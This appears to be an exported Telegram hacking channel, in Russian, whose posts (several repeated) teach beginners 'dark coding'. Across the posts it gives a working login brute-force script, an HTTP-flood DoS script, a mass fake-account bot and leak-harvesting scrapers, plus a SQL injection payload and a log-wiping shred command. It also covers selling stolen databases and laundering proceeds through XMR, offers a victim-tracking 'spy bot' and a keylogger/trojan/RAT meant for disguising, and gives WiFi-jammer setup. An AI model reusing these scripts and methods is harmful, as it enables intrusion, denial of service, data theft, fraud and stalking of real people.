БЫСТРЫЙ СТАРТ В ТЕМНЫЙ КОДИНГ
1. БАЗА БЕЗ ВОДЫ
Забей на университеты. Вот что реально работает:
· Python — для всего. Выучи: requests (парсинг), socket (сети), threading (многопоточка).
· Bash/PowerShell — автоматизация на системе жертвы.
· C — чтобы читать эксплойты и писать шеллкоды.
2. ИНСТРУМЕНТЫ, КОТОРЫЕ НАДО ВОРОВАТЬ СРАЗУ
· Visual Studio Code с плагинами для всего.
· Burp Suite — перехват и подмена трафика.
· Wireshark — анализ сетевого потока.
· Metasploit — готовые эксплойты.
· John the Ripper — взлом хэшей.
3. ГДЕ БРАТЬ ЗНАНИЯ (ТЕМНЫЕ КАНАЛЫ)
· Telegram: @blackhat_books, @exploit_db_mirror, @xaknet_archive.
· Форумы (через Tor): BreachForums, XSS.is, Russian Carding.
· GitHub: ищи "exploit", "pentest", "hacking-tools". Форкай все.
4. ПЕРВЫЙ СКРИПТ (БРУТФОРС ЛОГИНА)
5. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ ЧЕРЕЗ КОД
· Пиши фишинговые страницы (клонируй любой сайт за 5 минут).
· Генерируй поддельные письма с Excel-макросами.
· Через Selenium автоматизируй действия в браузере жертвы.
6. МОНЕТИЗАЦИЯ (БЕЗ ЛИШНИХ РАЗГОВОРОВ)
· Парси уязвимые сайты (SQL-инъекции) -> доставай базы -> продавай.
· Автопродажи: Telegram-боты для продажи "цифрового товара".
· Обнал через крипту: Bitcoin -> XMR -> обменники с низким KYC.
7. ОПСЕК (ЧТОБЫ НЕ СЕСТЬ)
· Никогда не работать со своего IP. Только VPN + Tor + цепочка прокси.
· Одноразовые виртуалки (VirtualBox + Tails OS).
· Телефон только для регистраций (купить за кэш без камер).
· Все логи стирать командой: shred -zuf /var/log/*
8. ПРАВИЛО КАГАЛА
Ты не один. Если нашел уязвимость — шерись с братьями. Если слил базу — сначала в общий чат. Нас много — система этого не понимает.
СТАРТУЙ СЕЙЧАС:
1. Установи Kali Linux.
2. Найди на GitHub 10 скриптов для взлома.
3. Протестируй их на тестовых мишенях (hackthebox.com).
4. Первый реальный таргет — сайты на WordPress (у них дыр полно).
ЗАПОМНИ: Каждый день, который ты не кодишь — это день, когда система становится сильнее. Ломай. Воруй. Делись.
в следующем посте будет небольшая статья о том как правильно и безопастно писать софты
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
1. БАЗА БЕЗ ВОДЫ
Забей на университеты. Вот что реально работает:
· Python — для всего. Выучи: requests (парсинг), socket (сети), threading (многопоточка).
· Bash/PowerShell — автоматизация на системе жертвы.
· C — чтобы читать эксплойты и писать шеллкоды.
2. ИНСТРУМЕНТЫ, КОТОРЫЕ НАДО ВОРОВАТЬ СРАЗУ
· Visual Studio Code с плагинами для всего.
· Burp Suite — перехват и подмена трафика.
· Wireshark — анализ сетевого потока.
· Metasploit — готовые эксплойты.
· John the Ripper — взлом хэшей.
3. ГДЕ БРАТЬ ЗНАНИЯ (ТЕМНЫЕ КАНАЛЫ)
· Telegram: @blackhat_books, @exploit_db_mirror, @xaknet_archive.
· Форумы (через Tor): BreachForums, XSS.is, Russian Carding.
· GitHub: ищи "exploit", "pentest", "hacking-tools". Форкай все.
4. ПЕРВЫЙ СКРИПТ (БРУТФОРС ЛОГИНА)
import requests
import threading
target_url = "http://target.com/login"
usernames = ["admin", "user", "root"]
passwords = ["123456", "password", "admin"]
def brute(user, pwd):
data = {"login": user, "password": pwd}
r = requests.post(target_url, data=data)
if "error" not in r.text.lower():
print(f"[+] ВЗЛОМАНО: {user}:{pwd}")
with open("hacked.txt", "a") as f:
f.write(f"{user}:{pwd}\n")
for u in usernames:
for p in passwords:
threading.Thread(target=brute, args=(u, p)).start()5. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ ЧЕРЕЗ КОД
· Пиши фишинговые страницы (клонируй любой сайт за 5 минут).
· Генерируй поддельные письма с Excel-макросами.
· Через Selenium автоматизируй действия в браузере жертвы.
6. МОНЕТИЗАЦИЯ (БЕЗ ЛИШНИХ РАЗГОВОРОВ)
· Парси уязвимые сайты (SQL-инъекции) -> доставай базы -> продавай.
· Автопродажи: Telegram-боты для продажи "цифрового товара".
· Обнал через крипту: Bitcoin -> XMR -> обменники с низким KYC.
7. ОПСЕК (ЧТОБЫ НЕ СЕСТЬ)
· Никогда не работать со своего IP. Только VPN + Tor + цепочка прокси.
· Одноразовые виртуалки (VirtualBox + Tails OS).
· Телефон только для регистраций (купить за кэш без камер).
· Все логи стирать командой: shred -zuf /var/log/*
8. ПРАВИЛО КАГАЛА
Ты не один. Если нашел уязвимость — шерись с братьями. Если слил базу — сначала в общий чат. Нас много — система этого не понимает.
СТАРТУЙ СЕЙЧАС:
1. Установи Kali Linux.
2. Найди на GitHub 10 скриптов для взлома.
3. Протестируй их на тестовых мишенях (hackthebox.com).
4. Первый реальный таргет — сайты на WordPress (у них дыр полно).
ЗАПОМНИ: Каждый день, который ты не кодишь — это день, когда система становится сильнее. Ломай. Воруй. Делись.
в следующем посте будет небольшая статья о том как правильно и безопастно писать софты
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Чёрный софт: дд0s, автоматизация атак и поиск утечек
ВНИМАНИЕ: Информация строго для анализа защиты. Создание и использование такого ПО незаконно. И так же за свои действия ответственность ведёте только ВЫ!
1. дд0s-СОФТ (ПРИНЦИП)
Концепция: Нагрузка на цель до отказа. Не vзл0м, но деструктивно.
Код-скелет на Python (HTTP-flood):
Усложнение или же для вашего блага:
· Использование прокси-листов (обход блокировок IP, плюс анонимность тк для того скелета ваш айпи палится при атаке)
· Атака на слабые endpoints (тяжёлые поисковые запросы)
· UDP/ICMP flood (требует raw-сокетов, права root)
Готовые решения (в д@рkнeтe):
· LOIC (Low Orbit Ion Cannon) — базовая
· HOIC (более продвинутая)
· Mirai-ботнет (заражённые IoT-устройства)
2. s0фт ДЛЯ АВТОМАТИЗАЦИИ ДЕЙСТВИЙ
Концепция: Имитация человека для массовых операций.
Пример: автоматический парсинг и регистрация аккаунтов (Python + Selenium):
from selenium import webdriver
import random, string
def random_mail():
return ''.join(random.choices(string.ascii_lowercase, k=8)) + "@gmail.com"
driver = webdriver.Chrome()
for _ in range(1000): # 1000 аккаунтов
driver.get("https://target-site.com/register")
driver.find_element("id", "email").send_keys(random_mail())
driver.find_element("id", "password").send_keys("Password123!")
driver.find_element("id", "submit").click()
Что автоматизируют:
· Регистрация фейковых аккаунтов
· Накрутка просмотров/лайков
· Массовая рассылка сообщений
· Автоматический подбор параметров в формах (брутфорс)
3. СОФТ ДЛЯ ПОИСКА УТЕЧЕК И СТРОК ИЗ НИХ
Концепция: Сканирование открытых источников и даркнета на наличие слитых данных.
Ключевые методы:
А. Мониторинг даркнет-форумов и чатов (Telegram-бот):
import telethon, re, sqlite3
client = telethon.TelegramClient(...)
db = sqlite3.connect('leaks.db')
@client.on(telethon.events.NewMessage)
async def handler(event):
msg = event.message.text
# Поиск паттернов: emails, номера карт, логины
emails = re.findall(r'[\w\.-]+@[\w\.-]+', msg)
for email in emails:
db.execute("INSERT OR IGNORE INTO leaks VALUES (?)", (email,))
Б. Сканирование публичных паст-сайтов (Pastebin-like):
import requests, re
sites = ["pastebin.com", "justpaste.it", "ghostbin.com"]
for site in sites:
# Получение ID свежих паст через API/парсинг
# Анализ текста на наличие чувствительных данных:
patterns = {
'db_password': r'pass.*?=\s*[\'"](.*?)[\'"]',
'email:pass': r'([^:]+):([^:]+)'
}
В. Анализ утекших баз (после получения дампа):
import hashlib, re
def analyze_dump(file_path):
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
data = f.read()
# Поиск специфичных данных
domains = re.findall(r'@([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})', data)
# Статистика по популярным доменам
from collections import Counter
print(Counter(domains).most_common(10))
# Проверка своих данных в утечке
my_creds = ["my@mail.com", "my_login"]
for cred in my_creds:
if cred in data:
print(f"НАЙДЕНО В УТЕЧКЕ: {cred}")
Готовые инструменты для поиска утечек:
· DeHashed (коммерческий, но мощный)
· LeakCheck (агрегатор)
· Snusbase (даркнет-версия)
· Intelx.io (поиск по индексам)
Технические фишки:
1. Работа с хешами: Преобразование найденных паролей в MD5/SHA1 для сравнения с другими утечками.
2. Кросс-референс: Связывание данных из разных утечек для построения полного профиля.
3. Telegram-мониторинг: Автоматические боты в каналах типа @leakbase, @databreach.
ЗАЩИТА:
· Использовать уникальные пароли
· Мониторить свои данные в утечках (HaveIBeenPwned)
· Включать 2FA везде
ВНИМАНИЕ: Информация строго для анализа защиты. Создание и использование такого ПО незаконно. И так же за свои действия ответственность ведёте только ВЫ!
1. дд0s-СОФТ (ПРИНЦИП)
Концепция: Нагрузка на цель до отказа. Не vзл0м, но деструктивно.
Код-скелет на Python (HTTP-flood):
import threading
import requests
target_url = "http://target.com"
threads = 500
def attack():
while True:
try:
requests.get(target_url, timeout=3)
except:
pass
for i in range(threads):
thread = threading.Thread(target=attack)
thread.daemon = True
thread.start()
while True: pass # Бесконечная атакаУсложнение или же для вашего блага:
· Использование прокси-листов (обход блокировок IP, плюс анонимность тк для того скелета ваш айпи палится при атаке)
· Атака на слабые endpoints (тяжёлые поисковые запросы)
· UDP/ICMP flood (требует raw-сокетов, права root)
Готовые решения (в д@рkнeтe):
· LOIC (Low Orbit Ion Cannon) — базовая
· HOIC (более продвинутая)
· Mirai-ботнет (заражённые IoT-устройства)
2. s0фт ДЛЯ АВТОМАТИЗАЦИИ ДЕЙСТВИЙ
Концепция: Имитация человека для массовых операций.
Пример: автоматический парсинг и регистрация аккаунтов (Python + Selenium):
from selenium import webdriver
import random, string
def random_mail():
return ''.join(random.choices(string.ascii_lowercase, k=8)) + "@gmail.com"
driver = webdriver.Chrome()
for _ in range(1000): # 1000 аккаунтов
driver.get("https://target-site.com/register")
driver.find_element("id", "email").send_keys(random_mail())
driver.find_element("id", "password").send_keys("Password123!")
driver.find_element("id", "submit").click()
Что автоматизируют:
· Регистрация фейковых аккаунтов
· Накрутка просмотров/лайков
· Массовая рассылка сообщений
· Автоматический подбор параметров в формах (брутфорс)
3. СОФТ ДЛЯ ПОИСКА УТЕЧЕК И СТРОК ИЗ НИХ
Концепция: Сканирование открытых источников и даркнета на наличие слитых данных.
Ключевые методы:
А. Мониторинг даркнет-форумов и чатов (Telegram-бот):
import telethon, re, sqlite3
client = telethon.TelegramClient(...)
db = sqlite3.connect('leaks.db')
@client.on(telethon.events.NewMessage)
async def handler(event):
msg = event.message.text
# Поиск паттернов: emails, номера карт, логины
emails = re.findall(r'[\w\.-]+@[\w\.-]+', msg)
for email in emails:
db.execute("INSERT OR IGNORE INTO leaks VALUES (?)", (email,))
Б. Сканирование публичных паст-сайтов (Pastebin-like):
import requests, re
sites = ["pastebin.com", "justpaste.it", "ghostbin.com"]
for site in sites:
# Получение ID свежих паст через API/парсинг
# Анализ текста на наличие чувствительных данных:
patterns = {
'db_password': r'pass.*?=\s*[\'"](.*?)[\'"]',
'email:pass': r'([^:]+):([^:]+)'
}
В. Анализ утекших баз (после получения дампа):
import hashlib, re
def analyze_dump(file_path):
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
data = f.read()
# Поиск специфичных данных
domains = re.findall(r'@([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})', data)
# Статистика по популярным доменам
from collections import Counter
print(Counter(domains).most_common(10))
# Проверка своих данных в утечке
my_creds = ["my@mail.com", "my_login"]
for cred in my_creds:
if cred in data:
print(f"НАЙДЕНО В УТЕЧКЕ: {cred}")
Готовые инструменты для поиска утечек:
· DeHashed (коммерческий, но мощный)
· LeakCheck (агрегатор)
· Snusbase (даркнет-версия)
· Intelx.io (поиск по индексам)
Технические фишки:
1. Работа с хешами: Преобразование найденных паролей в MD5/SHA1 для сравнения с другими утечками.
2. Кросс-референс: Связывание данных из разных утечек для построения полного профиля.
3. Telegram-мониторинг: Автоматические боты в каналах типа @leakbase, @databreach.
ЗАЩИТА:
· Использовать уникальные пароли
· Мониторить свои данные в утечках (HaveIBeenPwned)
· Включать 2FA везде
Итог: Такой софт — просто автоматизация рутинных действий. Реальная опасность — в масштабе, который он позволяет достичь: тысячи атак в минуту, мониторинг сотен источников утечек одновременно. Защита должна быть такой же автоматизированной.
в следующей статью напишу как на самом деле сливают бд
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
в следующей статью напишу как на самом деле сливают бд
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Как на самом деле сливают базы данных?
от SQL-инъекции до внутренней утечки
Это не хакер в маске. Это скучные техники, которые работают годами. Вот как реально утекают миллионы записей.
1. ЧЕЛОВЕЧЕСКИЙ ФАКТОР (50% всех утечек, примеры)
· Доступ сотрудника: Админ базы данных копирует БД на флешку. Продает на теневом форуме.
· Публичный GitHub: Разработчик случайно заливает в репозиторий файл .env с паролями к БД или сам дамп базы.
· Социнженерия: Злоумышленник звонит в техподдержку, представляется сотрудником, получает доступ к панели управления БД.
Это конечно не работает, там все более замудренно
2. ТЕХНИЧЕСКИЕ УЯЗИВИМОСТИ
А. SQL-инъекция (классика):
Через форму ввода на сайте вставляется вредоносный SQL-код.
' UNION SELECT username, password FROM users --
Если сайт уязвим, эта команда вернет все логины и пароли.
Б. Открытые порты и пароли по умолчанию:
· Базы данных (MongoDB, Redis, Elasticsearch) вынесены в интернет без пароля.
· Сканеры (например, Shodan) находят их за минуты.
· Пример: в Shodan ищут "MongoDB Server Information" port:27017.
В. Уязвимости в ПО:
· Эксплойт для устаревшей версии phpMyAdmin или MySQL.
· Использование известных уязвимостей (CVE), для которых есть публичные эксплойты.
3. АТАКИ НА БЭКАПЫ
· Файлы резервных копий БД (.sql, .bak) лежат в открытом доступе на сервере.
· Достаточно перебрать стандартные названия: backup.sql, dump.zip, database.7z.
· Часто эти файлы находятся в папках backup/, admin/, old/.
4. ФИШИНГ ДЛЯ АДМИНОВ
1. Создается копия внутреннего портала компании.
2. Админу приходит письмо: "Требуется срочно войти в панель управления БД".
3. Он вводит логин/пароль → злоумышленник получает доступ.
5. ПРОДАЖА "ИЗНУТРИ"
Схема работы на теневом форуме:
[Продам] База данных крупного маркетплейса
• 5 млн пользователей
• Поля: email, телефон, хеши паролей
• Цена: $3000 в XMR
• Предоплата 50%, тестовая выборка - 100 записей
КАК ЗАЩИТИТЬСЯ (если вы админ):
1. Никаких баз в публичном доступе. Firewall, белые списки IP.
2. Пароли: сложные, разные, 2FA для админок.
3. Обновлять всё ПО БД и панели управления.
4. Аудит логинов: кто, когда и откуда подключался к БД.
5. Шифрование чувствительных данных в самой БД.
Итог: Большинство утечек — не гениальные атаки, а чья-то халатность: открытый порт, пароль admin123, файл бэкапа в публичной папке. Базы сливают не потому, что хакеры умные, а потому, что админы ленятся.
в следующий раз разберём как научится CSINT (противоположная версия OSINT, осинт - по открым источникам, ксинт - о закрытым источникам)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
от SQL-инъекции до внутренней утечки
Это не хакер в маске. Это скучные техники, которые работают годами. Вот как реально утекают миллионы записей.
1. ЧЕЛОВЕЧЕСКИЙ ФАКТОР (50% всех утечек, примеры)
· Доступ сотрудника: Админ базы данных копирует БД на флешку. Продает на теневом форуме.
· Публичный GitHub: Разработчик случайно заливает в репозиторий файл .env с паролями к БД или сам дамп базы.
· Социнженерия: Злоумышленник звонит в техподдержку, представляется сотрудником, получает доступ к панели управления БД.
Это конечно не работает, там все более замудренно
2. ТЕХНИЧЕСКИЕ УЯЗИВИМОСТИ
А. SQL-инъекция (классика):
Через форму ввода на сайте вставляется вредоносный SQL-код.
' UNION SELECT username, password FROM users --
Если сайт уязвим, эта команда вернет все логины и пароли.
Б. Открытые порты и пароли по умолчанию:
· Базы данных (MongoDB, Redis, Elasticsearch) вынесены в интернет без пароля.
· Сканеры (например, Shodan) находят их за минуты.
· Пример: в Shodan ищут "MongoDB Server Information" port:27017.
В. Уязвимости в ПО:
· Эксплойт для устаревшей версии phpMyAdmin или MySQL.
· Использование известных уязвимостей (CVE), для которых есть публичные эксплойты.
3. АТАКИ НА БЭКАПЫ
· Файлы резервных копий БД (.sql, .bak) лежат в открытом доступе на сервере.
· Достаточно перебрать стандартные названия: backup.sql, dump.zip, database.7z.
· Часто эти файлы находятся в папках backup/, admin/, old/.
4. ФИШИНГ ДЛЯ АДМИНОВ
1. Создается копия внутреннего портала компании.
2. Админу приходит письмо: "Требуется срочно войти в панель управления БД".
3. Он вводит логин/пароль → злоумышленник получает доступ.
5. ПРОДАЖА "ИЗНУТРИ"
Схема работы на теневом форуме:
[Продам] База данных крупного маркетплейса
• 5 млн пользователей
• Поля: email, телефон, хеши паролей
• Цена: $3000 в XMR
• Предоплата 50%, тестовая выборка - 100 записей
КАК ЗАЩИТИТЬСЯ (если вы админ):
1. Никаких баз в публичном доступе. Firewall, белые списки IP.
2. Пароли: сложные, разные, 2FA для админок.
3. Обновлять всё ПО БД и панели управления.
4. Аудит логинов: кто, когда и откуда подключался к БД.
5. Шифрование чувствительных данных в самой БД.
Итог: Большинство утечек — не гениальные атаки, а чья-то халатность: открытый порт, пароль admin123, файл бэкапа в публичной папке. Базы сливают не потому, что хакеры умные, а потому, что админы ленятся.
в следующий раз разберём как научится CSINT (противоположная версия OSINT, осинт - по открым источникам, ксинт - о закрытым источникам)
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
CSINT с нуля: как научиться киберразведке
че это ваще такое?: CSINT (Cyber Intelligence) — это разведка в цифровом пространстве. Не OSINT (открытые данные), а именно кибер: утечки, логи, следы в сети, данные серверов, метаданные.
1. БАЗА: БЕЗ НЕЁ НИКУДА
· Сети: TCP/IP, DNS, HTTP/HTтки, заголовки запросов.
· OS: Linux (Kali) на уровне терминала. Команды: grep, awk, curl, whois, nslookup.
· Языки: Python (базово) для автоматизации, SQL для работы с базами.
2. ИНСТРУМЕНТАРИЙ
Пассивная разведка:
· Shodan.io — поиск устройств, серверов, камер, БД в открытом доступе.
· Censys.io — аналог, но с детальной информацией по сертификатам.
· ZoomEye — китайский аналог, часто находит другие цели.
Активные методы (осторожно, могут оставлять следы):
· Nmap — сканирование портов. Базовый скрипт:
· theHarvester — сбор email, поддоменов.
· Maltego — визуализация связей (домены, IP, люди).
3. РАБОТА С УТЕЧКАМИ (ЯДРО CSINT)
Где искать:
· Даркнет-форумы (через Tor)
· Telegram-каналы (@leakbase, @databreach)
· Pastebin-сайты (pastebin.com, justpaste.it)
Как анализировать:
1. Получаешь дамп (файл с утекшими данными).
2. Фильтрация: grep по нужным параметрам (домену, ключевому слову).
3. Валидация: Проверка актуальности данных.
4. Связывание: Поиск пересечений с другими утечками.
Пример команды для анализа дампа:
4. МЕТАДАННЫЕ — ЦИФРОВЫЕ ОТПЕЧАТКИ
Инструменты:
· ExifTool — извлечение данных из фото/документов.
· FOCA — анализ метаданных в документах на сайте.
Что можно найти:
· Имя пользователя, который создал файл
· Координаты GPS (в фото с телефона)
· Даты создания/изменения
· Версию ПО
5. АВТОМАТИЗАЦИЯ НА PYTHON
Скрипт мониторинга новых утечек в Telegram:
6. ПОЛЕЗНЫЕ НАВЫКИ
· Анализ логинов: Понимание структуры логов веб-серверов (Apache, Nginx).
· Работа с БД: Умение делать запросы для поиска паттернов.
· Криптография базово: Хеши (MD5, SHA1), кодировки (Base64).
· Анонимность: Tor, прокси, VPN (чтобы тебя не засекли при разведке).
7. ГДЕ ТРЕНИРОВАТЬСЯ
· CTF-задачи (HackTheBox, TryHackMe) — разделы по intelligence.
· Анализ публичных инцидентов — разбор реальных утечек в СМИ.
· Собственный lab: Подними виртуальную сеть, настрой логирование, пытайся «найти себя».
8. ЭТИКА И ЗАКОН
CSINT на грани. Легально: анализ только своих систем или публичных данных. Нелегально: несанкционированный доступ к чужим системам, использование закрытых утечек.
Главное правило: Собирай разведданные, но не атакуй. Разведка — это глаза и уши. Атака — это руки. CSINT — это про глаза и уши.
Вывод: CSINT — это скучная, методичная работа, но вполне действенная. Ты не хакер, ты цифровой археолог. Копаешь данные, сопоставляешь факты, строишь картину (для визуализации и удобства советую Maltego). Начинай с основ сетей и Linux, потом инструменты, потом практика на легальных полигонах. Далее приступай к чему хотел.
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
че это ваще такое?: CSINT (Cyber Intelligence) — это разведка в цифровом пространстве. Не OSINT (открытые данные), а именно кибер: утечки, логи, следы в сети, данные серверов, метаданные.
1. БАЗА: БЕЗ НЕЁ НИКУДА
· Сети: TCP/IP, DNS, HTTP/HTтки, заголовки запросов.
· OS: Linux (Kali) на уровне терминала. Команды: grep, awk, curl, whois, nslookup.
· Языки: Python (базово) для автоматизации, SQL для работы с базами.
2. ИНСТРУМЕНТАРИЙ
Пассивная разведка:
· Shodan.io — поиск устройств, серверов, камер, БД в открытом доступе.
· Censys.io — аналог, но с детальной информацией по сертификатам.
· ZoomEye — китайский аналог, часто находит другие цели.
Активные методы (осторожно, могут оставлять следы):
· Nmap — сканирование портов. Базовый скрипт:
nmap -sV -O -p 1-1000 target.com
· theHarvester — сбор email, поддоменов.
· Maltego — визуализация связей (домены, IP, люди).
3. РАБОТА С УТЕЧКАМИ (ЯДРО CSINT)
Где искать:
· Даркнет-форумы (через Tor)
· Telegram-каналы (@leakbase, @databreach)
· Pastebin-сайты (pastebin.com, justpaste.it)
Как анализировать:
1. Получаешь дамп (файл с утекшими данными).
2. Фильтрация: grep по нужным параметрам (домену, ключевому слову).
3. Валидация: Проверка актуальности данных.
4. Связывание: Поиск пересечений с другими утечками.
Пример команды для анализа дампа:
# Поиск всех записей с доменом gmail.com
grep -i "@gmail.com" leaked_dump.txt | head -20
# Поиск конкретного логина
grep "username123" leaked_dump.txt
# Извлечение только паролей
awk -F: '{print $2}' leaked_dump.txt | sort | uniq
4. МЕТАДАННЫЕ — ЦИФРОВЫЕ ОТПЕЧАТКИ
Инструменты:
· ExifTool — извлечение данных из фото/документов.
· FOCA — анализ метаданных в документах на сайте.
Что можно найти:
· Имя пользователя, который создал файл
· Координаты GPS (в фото с телефона)
· Даты создания/изменения
· Версию ПО
5. АВТОМАТИЗАЦИЯ НА PYTHON
Скрипт мониторинга новых утечек в Telegram:
from telethon import TelegramClient, events
api_id = YOUR_ID
api_hash = 'YOUR_HASH'
client = TelegramClient('session', api_id, api_hash)
@client.on(events.NewMessage(chats=('leakbase')))
async def handler(event):
if 'dump' in event.message.text.lower():
print(f'Новая утечка: {event.message.text}')
# Автосохранение или парсинг
client.start()
client.run_until_disconnected()
6. ПОЛЕЗНЫЕ НАВЫКИ
· Анализ логинов: Понимание структуры логов веб-серверов (Apache, Nginx).
· Работа с БД: Умение делать запросы для поиска паттернов.
· Криптография базово: Хеши (MD5, SHA1), кодировки (Base64).
· Анонимность: Tor, прокси, VPN (чтобы тебя не засекли при разведке).
7. ГДЕ ТРЕНИРОВАТЬСЯ
· CTF-задачи (HackTheBox, TryHackMe) — разделы по intelligence.
· Анализ публичных инцидентов — разбор реальных утечек в СМИ.
· Собственный lab: Подними виртуальную сеть, настрой логирование, пытайся «найти себя».
8. ЭТИКА И ЗАКОН
CSINT на грани. Легально: анализ только своих систем или публичных данных. Нелегально: несанкционированный доступ к чужим системам, использование закрытых утечек.
Главное правило: Собирай разведданные, но не атакуй. Разведка — это глаза и уши. Атака — это руки. CSINT — это про глаза и уши.
Вывод: CSINT — это скучная, методичная работа, но вполне действенная. Ты не хакер, ты цифровой археолог. Копаешь данные, сопоставляешь факты, строишь картину (для визуализации и удобства советую Maltego). Начинай с основ сетей и Linux, потом инструменты, потом практика на легальных полигонах. Далее приступай к чему хотел.
кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
Forwarded from Pepe faa (шансон TXX)
я буду делать dd#s ботнет делать...
простеньким - ❤️
полноценный ботнет - 👍
простеньким - ❤️
полноценный ботнет - 👍
❤2👍1
Pepe faa
я буду делать dd#s ботнет делать... простеньким - ❤️ полноценный ботнет - 👍
впринцепи готово, завтра буду тестить
20 - ❤️
и 40 сабов добиваем и я сливаю
кодинг с шансом 👇
@CodingChans
20 - ❤️
и 40 сабов добиваем и я сливаю
кодинг с шансом 👇
@CodingChans
TG_shpion @CodingChans.zip
134.6 KB
ловите бота-шпиона, который будет вам показывать когда ваша жертва в сети и когда вышла.
как запустить?
мне лень просто писать было много ну вроде понятно объяснил
кодинг с шансом 👇
@CodingChans
как запустить?
1. Распакуйте файл где удобно
2. Откройте консоль (Win+R, в окошке ввести cmd)
3. Напишите в терминал "cd [путь к папке]"
4. Изменяем в файле TG_shpion...... все под себя
5. Устанавливаем зависимости:
pip install -R requirements.txt
6. Запустите: python shpion.py
На Android
1. сделайте тот же самый первый пункт (выше)
2. Откройте Termux
3. тот же 3 пункт (выше)
4. сделайте как в 5 пункте (выше)
5. Повторите как в 6 пункте
мне лень просто писать было много ну вроде понятно объяснил
кодинг с шансом 👇
@CodingChans
Forwarded from Эксельру Шинигами 🏴☠️
Та стои он меня за догсит
Forwarded from Эксельру Шинигами 🏴☠️
Жду на себя досье от бомжа день первый
Forwarded from Pepe faa (шансон TXX)
че вам сделать интересного?
пишите идеи в комы
пишите идеи в комы
❤3
AyuGram IOS.zip
1.9 KB
ловите чистейший
K3yL0gg3r + Tr0j@n + R@T
если хотите можете замаскировать это все под приложение/софт/скрипт, или же скомплировать это все в .exe
в файле Gram.py замените свои данные!
кодинг с шансом 👇
@CodingChans
K3yL0gg3r + Tr0j@n + R@T
если хотите можете замаскировать это все под приложение/софт/скрипт, или же скомплировать это все в .exe
в файле Gram.py замените свои данные!
кодинг с шансом 👇
@CodingChans
Глушим WiFi соединения
Сейчас в Рф обильно глушат мобильный интернет, но что насчет WiFi
WiFiJammer — это инструмент для dd0$-атаk на беспроводные сети. Он блокuрует Wi-Fi соединения в определённой зоне, создавая помехи между устройствами и точками доступа
💡Установка: Установи Python (желательно 2.7) и клонируй репозиторий:
Перейди в папку программы:
Установи необходимые зависимости:
Запусти скрипт:
кодинг с шансом 👇
@CodingChans
Сейчас в Рф обильно глушат мобильный интернет, но что насчет WiFi
WiFiJammer — это инструмент для dd0$-атаk на беспроводные сети. Он блокuрует Wi-Fi соединения в определённой зоне, создавая помехи между устройствами и точками доступа
💡Установка: Установи Python (желательно 2.7) и клонируй репозиторий:
git clone https://github.com/DanMcInerney/wifijammer.git
Перейди в папку программы:
cd wifijammer
Установи необходимые зависимости:
pip install -r requirements.txt
Запусти скрипт:
sudo python wifijammer.py
кодинг с шансом 👇
@CodingChans